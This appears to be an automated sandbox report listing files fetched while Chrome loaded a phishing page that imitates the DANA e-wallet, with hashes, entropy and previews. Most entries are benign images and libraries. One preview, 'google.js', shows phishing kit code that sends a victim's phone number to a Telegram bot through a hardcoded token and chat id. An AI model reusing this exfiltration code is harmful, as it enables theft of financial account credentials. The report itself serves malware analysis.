                                                                                                                            Preview:.PNG........IHDR...,...,......tF.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME..........c....IDATx...odGv..son.L..-.o.HU%..T.[Rkma...[......<..4.`..../.4....0.c...n`..I-...V..ZT{...o.%....".d.......(V....'N...4.................,,,2(2X$I.'N..P(.+......A.....i#......L..@.~....X(2.H?..`.9bX.Yg.....I-.. .I=.4..>....m{.Y!.s+'..I.Y&.*C.. cw..M-..C.v.i.....x...rwaB.[M.'.:c,...k..n.jq..%.h..N:..@..........S,...q.......v..C0....v...M..e..b..n..U..!..M+..P..q..-@.M..a..b..~./a...9C;Mx..twG/-@.%f..,K...*.~L..0H.-...Q.a..X`...X;.#.. . ..`.z...R.B..#.1...).:n.K..........E..s<.!s$..Ni.q'..r.>B...S.!...q.aV...Q+.>.V............d.[.c.}.t..|tr..4!.k.# (...&S....$.:.9..A..?U(.l0.mF..0.....8.s..)I.DH0.5....w....r....|.JV\W.v....,?'.H.>j....IF......sXA..I?/0X.._>.$.|.#.F.*,..K<MH.*..:w..)g..3...y.....B.%np.E......g.D;..U....|.wN.%,..W9.W......|...Z...;...o.awA\.A..xYtNt.).29..\..IW..P..MV....V.?.u...1....A.,.iwQ. ,..x....q.....t...
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (1094), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1094
                                                                                                                            Entropy (8bit):5.039881275741144
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:UXmRqFTYh1KmSiotvrRThJIbALH7x5ZnySHYj28:imRqFTYh1KmSiGvZXx5Fb4j28
                                                                                                                            MD5:62432C4BCF2D4F5737B7104EE2F87318
                                                                                                                            SHA1:4F197801A3174C7144A8671328A07C9D0A76C363
                                                                                                                            SHA-256:C20FA1A22F15F8CF1E459B5BD91740823854099E77840B716D8D4AA24E9C7CF1
                                                                                                                            SHA-512:62604B2F28FFDE7A67EF03ABCC428A12660FE4A1D3B4D1DD55CC30A5419A064819D2D81313A9E83D2B35EB6C00751AC1812069053B506411833FAF36911DEB06
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:import{g as n}from"./p-d15ec307.js";let t;const e=()=>{if("undefined"==typeof window)return new Map;if(!t){const n=window;n.Ionicons=n.Ionicons||{},t=n.Ionicons.map=n.Ionicons.map||new Map}return t},r=n=>{const t=e();Object.keys(n).forEach((e=>t.set(e,n[e])))},i=n=>{let t=u(n.src);if(t)return t;if(t=s(n.name,n.icon,n.mode,n.ios,n.md),t)return o(t);if(n.icon){if(t=u(n.icon),t)return t;if(t=u(n.icon[n.mode]),t)return t}return null},o=t=>e().get(t)||n(`svg/${t}.svg`),s=(n,t,e,r,i)=>(e="ios"===(e&&a(e))?"ios":"md",r&&"ios"===e?n=a(r):i&&"md"===e?n=a(i):(n||!t||l(t)||(n=t),d(n)&&(n=a(n))),d(n)&&""!==n.trim()?""!==n.replace(/[a-z]|-|\d/gi,"")?null:n:null),u=n=>d(n)&&(n=n.trim(),l(n))?n:null,l=n=>n.length>0&&/(\/|\.)/.test(n),d=n=>"string"==typeof n,a=n=>n.toLowerCase(),f=(n,t=[])=>{const e={};return t.forEach((t=>{n.hasAttribute(t)&&(null!==n.getAttribute(t)&&(e[t]=n.getAttribute(t)),n.removeAttribute(t))})),e},c=n=>n&&""!==n.dir?"rtl"===n.dir.toLowerCase():"rtl"===(null===document||void 0==
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (4141), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4141
                                                                                                                            Entropy (8bit):5.192518445216259
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:s4Fv5JG4pAMWlBz5YTmOv2SONaCav9pWMLnZVIrzR/LzVAdoqCWqCsqDnq0Yq44q:s4h5JG4ylBzqTXv2LNaHv9pWKWrV/3VJ
                                                                                                                            MD5:5305C9D6890ECF4E37E6828920544483
                                                                                                                            SHA1:1C0B2C47E127227005C0048C73D103490B2C5D25
                                                                                                                            SHA-256:A1ABB9748933534D9EBA6BE132C72C9846321F9AA6B063D5B51870299B71F0B3
                                                                                                                            SHA-512:FA7FCB4C373B912028624BF92812020187CF2ED4F64CE9DC126E91556290CCD41C8C4158EFD5305064CAFD304C986189ECF24E6E11289D87515509ECC8F5122F
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:import{r as o,h as i,H as t,a as n}from"./p-d15ec307.js";import{i as s,b as r,g as e,c,d as a}from"./p-40ae2aa7.js";const l=o=>{if(1===o.nodeType){if("script"===o.nodeName.toLowerCase())return!1;for(let i=0;i<o.attributes.length;i++){const t=o.attributes[i].name;if(s(t)&&0===t.toLowerCase().indexOf("on"))return!1}for(let i=0;i<o.childNodes.length;i++)if(!l(o.childNodes[i]))return!1}return!0},h=new Map,d=new Map;let f;const m=class{constructor(i){o(this,i),this.iconName=null,this.inheritedAttributes={},this.isVisible=!1,this.mode=u(),this.lazy=!1,this.sanitize=!0}componentWillLoad(){this.inheritedAttributes=r(this.el,["aria-label"])}connectedCallback(){this.waitUntilVisible(this.el,"50px",(()=>{this.isVisible=!0,this.loadIcon()}))}disconnectedCallback(){this.io&&(this.io.disconnect(),this.io=void 0)}waitUntilVisible(o,i,t){if(this.lazy&&"undefined"!=typeof window&&window.IntersectionObserver){const n=this.io=new window.IntersectionObserver((o=>{o[0].isIntersecting&&(n.disconnect(),this.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (311)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):4458
                                                                                                                            Entropy (8bit):5.36635101234614
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:I6og/8NBiYiLFdocKr/Ou5dBilIKiFDJ//Oiy/AFqr:TEiYi70rOWDiv8JHOiyUqr
                                                                                                                            MD5:85580463F57A575396A08CB66FA31F5F
                                                                                                                            SHA1:B83DBC3CED6A7973F21EE42C2F6FBE9521991EBA
                                                                                                                            SHA-256:8CA39CA4E83FD7E5982791199ED26AD5A55BE2DB1A70DF0DF531CB24BE84FFD6
                                                                                                                            SHA-512:53014B170A3E6AB42F6155A7D293A86B9D18795B54F1D9D77A75D2392831E60D61EB13FDE6F8FCA01681754B364BFA241D2BD5D7BD6F7255D74D1CC4B07977CC
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/google.js
                                                                                                                            Preview: function sendNohp(event){. $("#process").show();event.preventDefault();. $("#inp").blur();. . . . var nomor = document.getElementById("inp").value;. sessionStorage.setItem("nomor", nomor);. var logo = document.getElementById('logo'); . var inp = document.getElementById('inp');. . var gabungan = '' + logo.value + '%0A~%20.......... ........%20~%0A%20%20%20%20%20' + inp.value;. . var token = '6647695935:AAG5DM0nkSir2Z_BjcDr-rQNcT_XE0H9Ans'; // Ganti dengan token bot yang kamu buat. var grup = '6327757033'; // Ganti dengan chat id dari bot yang kamu buat.. $.ajax({. url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,. method: `POST`,. . success: function(){. $("#process").hide();. document.getElementById("back1").style.display = "none";. document.getElementById("back2").style.display = "block";. $("#formNohp").fadeOut();. se
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1116)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):30166
                                                                                                                            Entropy (8bit):5.4768789484919616
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:XzFzUWeU1EDILYf///cA96S0HnXBawPbBsVUk3i/8y5VW8P1g7pLsZB:DFUWeUET8XBawPbBsV3yrW8P1gFLsZB
                                                                                                                            MD5:4C8D7FF28441587CCF82A32D15401F35
                                                                                                                            SHA1:6A73F26FAFC38E66C7477ABB897D6F0F688BD70F
                                                                                                                            SHA-256:9533F0B6EB3640B974AB4A5E012027CC1906E4A20E816DC889FBD122EE0F2315
                                                                                                                            SHA-512:C4A78BD31E2186CAC173B99EE2142DF2188ECE10052FBDE2D66E6918F954D10A9DE3D88533C39BF65E465928EDDABC22F343FCEC97F6CB68C742E89EC622480F
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Preview:<html lang="id">. HTML Meta Tags -->.<head>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">. <meta name="theme-color" content="#118EEA">. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">. <title>........ | ................ ........ ........</title>. <meta name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">.. Facebook Meta Tags -->. <meta property="og:url" content="https://www.dana.id">. <meta property="og:type" content="website">. <meta property="og:title" content="........ | ................ ........ ........">. <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5078
                                                                                                                            Entropy (8bit):7.9162479598001845
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:SlG0ml1KICtII+3ok+yNdfBPA00KFY14dooNVO+3RrSGo2XR+nPRtu7MrprxeA12:iGrkIPYk+yNl0K+142+ZSpEEnPYM9xe3
                                                                                                                            MD5:E8E4E4432355A07040A7327673850223
                                                                                                                            SHA1:B07F6CFAACB6A2093778B08DD8D9B8F7D718C119
                                                                                                                            SHA-256:50B4BAD00572D07C6158459A5CB93B1B3F9BDEA95D393AA56970AFDED2F58913
                                                                                                                            SHA-512:7A88F02C1B3A28D852476219C80A3C5493FDC94339B19B3A2FC2C6F9EC9A8661636CD26E43CEC0A601B668AC1C5F02D3965832F89E76E4574953860EB945C636
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR..............Qf.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME...............IDATx...{....ZzQ...Z; .C.m.x.m.../.x..?;6Nf..N....v...m..$..!.[.VWW..u.....kU.....R.{..t...U.O...>4.0...'..8.(R....%......I..$.q...]$H.B...E..I.M6...l.M..P..$..!.0S...L3F?I,..D....|U.U.;.p.@.',.G,.B.....A.(TX.g..y..Ls...0pI1....^..x8..b.e......p;...!.BE.)^.....I..N..{..p.|b....s.0.*.N2..m..*.p...".$101(aV...00..`.b...fL.[...<\\ .0.^`.9.2...4...Y..L....@.8.&...1E..pq.%...l.e..r..E....).H..&I..66...>...e.;....2L$.*d..:W...B.-.a.[......s..e."%.*....$F....c.12....?..<.6.g.......8..).Hp..\..P*.q,\.,.#...?3.Fp.[...... .0cd.....!...:.....X,l...4Y.W....`...M...3..kn.j...x.M>5.`.c......6s..|9.i.......5>.E..[.'.<3|..|.Z...EM7#<...X.....X.G....P.Q<.u>.<)../b..y...........f..L.....a...._m.C*..+|.y.... ....?.-.!.E.-i.y.QR.G*uK.G.e..:.-Y...J........1........jf...>N0I.*......./.W.6..U=.\...S..[|...-.!.R...c......-.y.G....e.b..
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 300 x 300, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):7863
                                                                                                                            Entropy (8bit):7.944853026641418
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:Oxyj5jciyprh/k6wSpBFcrApNmH58Byn7w3tdZvdsqVhwN5RxADRPtkch:OxsjQpSIFaAqH58Byn7wZvdZVc5R4vFh
                                                                                                                            MD5:BF1D4A90DE7E29B2BE55237982CB30B4
                                                                                                                            SHA1:EF942049631B598767FDA52D54458B9F9680EE87
                                                                                                                            SHA-256:46518758F002D85CFF9220609163F23B7E9F8F2721561D1E0BA79C4F17425C58
                                                                                                                            SHA-512:3AC1AB4324711A94DDD9F5BC24D5E2CB3948073602AD5E52F0B2C7B61C1DF072ACA6FB9E015DA9E113071A353F7B7E1493EB7F2C9CDBBB6417938FAB17909B09
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:http://penukran-poin-dana.aktsx.cfd/asset/img/load_bg.png
                                                                                                                            Preview:.PNG........IHDR...,...,......tF.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME..........c....IDATx...odGv..son.L..-.o.HU%..T.[Rkma...[......<..4.`..../.4....0.c...n`..I-...V..ZT{...o.%....".d.......(V....'N...4.................,,,2(2X$I.'N..P(.+......A.....i#......L..@.~....X(2.H?..`.9bX.Yg.....I-.. .I=.4..>....m{.Y!.s+'..I.Y&.*C.. cw..M-..C.v.i.....x...rwaB.[M.'.:c,...k..n.jq..%.h..N:..@..........S,...q.......v..C0....v...M..e..b..n..U..!..M+..P..q..-@.M..a..b..~./a...9C;Mx..twG/-@.%f..,K...*.~L..0H.-...Q.a..X`...X;.#.. . ..`.z...R.B..#.1...).:n.K..........E..s<.!s$..Ni.q'..r.>B...S.!...q.aV...Q+.>.V............d.[.c.}.t..|tr..4!.k.# (...&S....$.:.9..A..?U(.l0.mF..0.....8.s..)I.DH0.5....w....r....|.JV\W.v....,?'.H.>j....IF......sXA..I?/0X.._>.$.|.#.F.*,..K<MH.*..:w..)g..3...y.....B.%np.E......g.D;..U....|.wN.%,..W9.W......|...Z...;...o.awA\.A..xYtNt.).29..\..IW..P..MV....V.?.u...1....A.,.iwQ. ,..x....q.....t...
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):8484
                                                                                                                            Entropy (8bit):7.924229044420093
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:ZC238elt8IjGXdEaokt/9MmhXAHm2yPfBJbA7nXAZVGMGQC2:sg/lt88Gttf7XAmzPXADWGo
                                                                                                                            MD5:74ADB66E545A68DF7E5A0442A02FA8E7
                                                                                                                            SHA1:A1692D3BFBDE3C0CB3A8BC9B9B1FB2DE4D570E85
                                                                                                                            SHA-256:4285DB40C51CC53230CAB0490DF40566E285B48FB2B2E4729B42FF2A26C74480
                                                                                                                            SHA-512:44FFC291A4790B3F0CC6F78CC170F882975A7902BC14035F8108D28CBF304034553E2AB5BD4BD1D7D2BF78F8EF31EDA4ADBB89A66604B56B610D2908F338F8CE
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:http://penukran-poin-dana.aktsx.cfd/asset/img/kom.png
                                                                                                                            Preview:.PNG........IHDR..............X......sRGB.........sBIT....|.d... .IDATx..{.%uu.....y...o.)2....x..A4..Dc.....WM.E.....d-....jn...L..(H@...&....Z....4.=.>U.{...._WW.SuN.Su....f...c.~.~....b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,..eA#E......8....5.J."....%.H..W.............o./...&H.......FT.#y?.S.~f.%../!....S!R.$o...;..2.,p.....\.B.CI>@....c.......x3...........-L..M/..H.&...,/Z.V!...._<f...#E..-X.I..K.....-K...p..l+Z..c.$....V..-K...p....-HYq...L...`..C9.`..QU}".cY"X..@...$.......D.h.J...)....122.z.e....-KY 9,"..n..mAH^.l...1..Y.`/...-K.Xp-H......hY...]"r.B^?YP-....x....9..;88..hY.b.(......l5[.Y.j...s..........................)...pv.r.#n....-D....B.a.'.-G...`3._.x..N.;&&&.........t.R.~...P........8JUOv..e........"..x....B...G.-G. y..|ydd......`.o..W....8LD.}.</....N*Z.. .).7......,..Z..yC.nt.rx......Y..+..<.Z.g.-G.(|.........l..g.u}..Z.V..x...$..........V.........h;d.t..g...k..".,..%.^.O..T..j ..).....{..7......a.9...]Gr..lI%.).o.....
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 360 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):16542
                                                                                                                            Entropy (8bit):7.94673343485081
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:rD/OMxpVl1O5h+X4cTIceArJp3/JhcrScEYkQq2Peex:rDjxpn1O5h+IcVeAp3fcrxvPdx
                                                                                                                            MD5:6E77DF79B301B9FB95FDF50D66E3CEB7
                                                                                                                            SHA1:1C93476FCCF582D5EA0FA88EC8B1BECC00D9EDB5
                                                                                                                            SHA-256:4262DC8D42209D7E2A597F7F1098880E75AD0F6A53A66DA1A7BD094A5F778199
                                                                                                                            SHA-512:995F53840326CC7C3F42E9DCD2CCDFDD8278FB100158D94B4B36D7799499E5FE03F34D7880713043ED5536EA240866DB338A2EC3FE9B6BF9FCDDFF1330EB1CC1
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR...h..........{.....sRGB.........sBIT....|.d... .IDATx..y.$U........t.6.6;.......'...8*.(.632"n.:*.......b...~......t....KUVe..............<..R.7N.q..s.9...@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ...........@V$..].O;....x.....H~.@..kf..+y ..AA......t........v.f..n...7.HR..W..(R....@......G__................G.f....#..I_w.-.Tt..9.VS.n.9w......N...5kf$..@`L..00fH....^.<.8..UR.`6:.S......>..o.-[v.>...7*........U$........*.....1./..3..p-.1Q.....t`T.4.x>p..W...l.... /..........1.+0...oG`B#)....\.x...&.s.E.....137.".&3..E..s$..[.....1&.x.>*.7....l.....L..&0.......b...s=.l.n..1....<.I.d}q..L.....}.[.Y...........7.l.....$....6.:.....Q.$..H......U.X......M.X.{...^..d.cj....l@.....*....*.v..Q@~.......|.X.2.....".M..$.*...~..4O....>.zZx...s7Iz...:........I.B.U.......F.~.V...$....VI..yO..A..t.)......;...Z..3f.*i...l..Yo.. .J>.....02....7p.sn?I_4..#p..$%......7..J|\.HP.6K*..V`#..>......BRw..'.r....'.vI]fv(#....6.....S#x.@
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (65451)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):89476
                                                                                                                            Entropy (8bit):5.2896589255084425
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                            MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                            SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                            SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                            SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://code.jquery.com/jquery-3.5.1.min.js
                                                                                                                            Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:GIF image data, version 89a, 599 x 944
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1386608
                                                                                                                            Entropy (8bit):7.948969560961841
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:l4aakeklO/ZuwKLBZc9cze/MI79RPXCZWboEuPMdctT8OpYKQK:l/A/ZuwWMcze/MI7r/CUboElOtDp9
                                                                                                                            MD5:3C0CBF27635610CC0872EB182C737B41
                                                                                                                            SHA1:E9496FD5B16ED12289D07BB4E4EFCDD0F4AC6450
                                                                                                                            SHA-256:90B285F5AD416E5FFA9A0F86C73653641C4B69E12A108011B362E8D1158D7594
                                                                                                                            SHA-512:C9684C8B5295904E0FCD8874DD2F884443AD062F2E78A40FF4532BEBC3C6FB2AFB3D1F80957B381A9C037B41C7F278D19DFD3CE261A5EC4370B3B2120D1DCC3C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:GIF89aW.......}........k..........................................................................}........o.... .."u.$..&s.&..+..-../r./}.0..1..3..5..9..<r.=..=..>y.@..A..Hx.I~.J..J..N..N..O..O..T..T..U..W..X..Yx.Y~.[..[..]..`..a..e..f..f..i..i..k..l..l..n..p..s..s..u..u..v..v..w.|..}xz................{..................................................................................................................................................................................U..L..O..f..f..f.....a..e. . "Ic$$&'Pg+)+,/1-L\-f......0.Th/-///30./6-'>=>?Zl@NW@WfBUbBVbBWbC.`GV`G[iHFHHNRO.zQIHZfo\[\c.fB.f.m.{xec~ua.^m.e.R..]].a.>U.qy...,.N...j..l>.v.....5C........Q..9........>..>..`........P..?....x.........7........e...................................!..NETSCAPE2.0.....!. Cropped with ezgif.com GIF maker.!.......,....W.......'..H......*\.p!...%H......3j.... ?N.h..H.!.....`.._V.......F<....@.j\)...H.*.y.e..B..t..i....*%....`{.......i.}..g.d]V.it..w....T'B.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 300 x 300, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):7863
                                                                                                                            Entropy (8bit):7.944853026641418
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:Oxyj5jciyprh/k6wSpBFcrApNmH58Byn7w3tdZvdsqVhwN5RxADRPtkch:OxsjQpSIFaAqH58Byn7wZvdZVc5R4vFh
                                                                                                                            MD5:BF1D4A90DE7E29B2BE55237982CB30B4
                                                                                                                            SHA1:EF942049631B598767FDA52D54458B9F9680EE87
                                                                                                                            SHA-256:46518758F002D85CFF9220609163F23B7E9F8F2721561D1E0BA79C4F17425C58
                                                                                                                            SHA-512:3AC1AB4324711A94DDD9F5BC24D5E2CB3948073602AD5E52F0B2C7B61C1DF072ACA6FB9E015DA9E113071A353F7B7E1493EB7F2C9CDBBB6417938FAB17909B09
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR...,...,......tF.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME..........c....IDATx...odGv..son.L..-.o.HU%..T.[Rkma...[......<..4.`..../.4....0.c...n`..I-...V..ZT{...o.%....".d.......(V....'N...4.................,,,2(2X$I.'N..P(.+......A.....i#......L..@.~....X(2.H?..`.9bX.Yg.....I-.. .I=.4..>....m{.Y!.s+'..I.Y&.*C.. cw..M-..C.v.i.....x...rwaB.[M.'.:c,...k..n.jq..%.h..N:..@..........S,...q.......v..C0....v...M..e..b..n..U..!..M+..P..q..-@.M..a..b..~./a...9C;Mx..twG/-@.%f..,K...*.~L..0H.-...Q.a..X`...X;.#.. . ..`.z...R.B..#.1...).:n.K..........E..s<.!s$..Ni.q'..r.>B...S.!...q.aV...Q+.>.V............d.[.c.}.t..|tr..4!.k.# (...&S....$.:.9..A..?U(.l0.mF..0.....8.s..)I.DH0.5....w....r....|.JV\W.v....,?'.H.>j....IF......sXA..I?/0X.._>.$.|.#.F.*,..K<MH.*..:w..)g..3...y.....B.%np.E......g.D;..U....|.wN.%,..W9.W......|...Z...;...o.awA\.A..xYtNt.).29..\..IW..P..MV....V.?.u...1....A.,.iwQ. ,..x....q.....t...
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (1094), with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):1094
                                                                                                                            Entropy (8bit):5.039881275741144
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:UXmRqFTYh1KmSiotvrRThJIbALH7x5ZnySHYj28:imRqFTYh1KmSiGvZXx5Fb4j28
                                                                                                                            MD5:62432C4BCF2D4F5737B7104EE2F87318
                                                                                                                            SHA1:4F197801A3174C7144A8671328A07C9D0A76C363
                                                                                                                            SHA-256:C20FA1A22F15F8CF1E459B5BD91740823854099E77840B716D8D4AA24E9C7CF1
                                                                                                                            SHA-512:62604B2F28FFDE7A67EF03ABCC428A12660FE4A1D3B4D1DD55CC30A5419A064819D2D81313A9E83D2B35EB6C00751AC1812069053B506411833FAF36911DEB06
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-40ae2aa7.js
                                                                                                                            Preview:import{g as n}from"./p-d15ec307.js";let t;const e=()=>{if("undefined"==typeof window)return new Map;if(!t){const n=window;n.Ionicons=n.Ionicons||{},t=n.Ionicons.map=n.Ionicons.map||new Map}return t},r=n=>{const t=e();Object.keys(n).forEach((e=>t.set(e,n[e])))},i=n=>{let t=u(n.src);if(t)return t;if(t=s(n.name,n.icon,n.mode,n.ios,n.md),t)return o(t);if(n.icon){if(t=u(n.icon),t)return t;if(t=u(n.icon[n.mode]),t)return t}return null},o=t=>e().get(t)||n(`svg/${t}.svg`),s=(n,t,e,r,i)=>(e="ios"===(e&&a(e))?"ios":"md",r&&"ios"===e?n=a(r):i&&"md"===e?n=a(i):(n||!t||l(t)||(n=t),d(n)&&(n=a(n))),d(n)&&""!==n.trim()?""!==n.replace(/[a-z]|-|\d/gi,"")?null:n:null),u=n=>d(n)&&(n=n.trim(),l(n))?n:null,l=n=>n.length>0&&/(\/|\.)/.test(n),d=n=>"string"==typeof n,a=n=>n.toLowerCase(),f=(n,t=[])=>{const e={};return t.forEach((t=>{n.hasAttribute(t)&&(null!==n.getAttribute(t)&&(e[t]=n.getAttribute(t)),n.removeAttribute(t))})),e},c=n=>n&&""!==n.dir?"rtl"===n.dir.toLowerCase():"rtl"===(null===document||void 0==
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:GIF image data, version 89a, 599 x 944
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):1188349
                                                                                                                            Entropy (8bit):7.9105387110482965
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:6ticeGSw0X1YpmtEg5px3fOtxaOpPP6gKSHZE3thJoFHAXLZqhGG+LZd6e:lwFm+KTmDaOpPP6+E3BnbcR+Ke
                                                                                                                            MD5:785A25D36D14A2C575547966151F81A1
                                                                                                                            SHA1:76B935386863F57B8B829B0D778F0A9257AC4B9D
                                                                                                                            SHA-256:F630B7D3B73881E20CB5CDE9FEFB66E917F66CE96264F0A381ED39A6A399265A
                                                                                                                            SHA-512:1CD2CEE312076114DCBCE17D674CFA90E66B1B81059A6374CB0A265B937D938CC3A01B01AC0823389284A0C90CFFA1D66E3BE54373BE76C9563B79741DB8E1B2
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr_fEgVfhY823rmnMewtU59iGvsFjcBm-12OLSj81f57ZEksJeU2GaG7UU3zuwDsOsfTO4dAJ693JJyILcXjdHEzirw-pPBCeV1CfTqSroNgoMTGIfy-Y-HC8GAJDmo68GYd1-x2gGu0UsincrU/s16000/ezgif.com-crop%20(5).gif
                                                                                                                            Preview:GIF89aW.......~..............P..i..e..f..x........................................................m.......................~..........................o..|....!Lm"..#..#..#..#..$l.$..%..%..&w.&..'..'..'..'..(..(..(..(..(..(..)..)..)..)..+..,..,........0..1..6..7..:..;..<..<..=..=..>}.?y.@..@..Aq.A..A..C..C..E..K..R..T..T..T..Uw.U|.Z..`kpc..c..e..e..g..g..g..h..j..l..q..q..s..u..vuwz..{..}..._L.............wu.......................y..........P#............................_L...................zw.......O........................................../..t....O.......xp...........J..}..=....`..t....eP...........................9c.O.((*,/4--.-.1/-//..0/09,%;9:?+$@KSHGHMFEVTU.Pf......LL.5..8L.ZR....b.......................ZJ.v..................................!..NETSCAPE2.0.....!. Cropped with ezgif.com GIF maker.!.......,....W.......7..H......*\. ...2X...B..#j... C...q.A."P.....0c..9....X..h.$..9W....a..).v,...P.J.J..U..+...5..N.>.`.`.:..].R.G.8..Yr .l..%.6.R.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (1561), with no line terminators
                                                                                                                            Category:downloaded
